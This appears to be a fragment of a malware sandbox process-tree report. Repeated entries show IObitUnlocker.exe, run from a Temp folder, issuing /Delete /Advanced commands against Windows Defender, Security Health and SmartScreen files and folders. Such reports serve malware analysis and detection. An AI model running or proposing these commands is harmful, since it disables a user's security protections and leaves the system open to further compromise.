Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 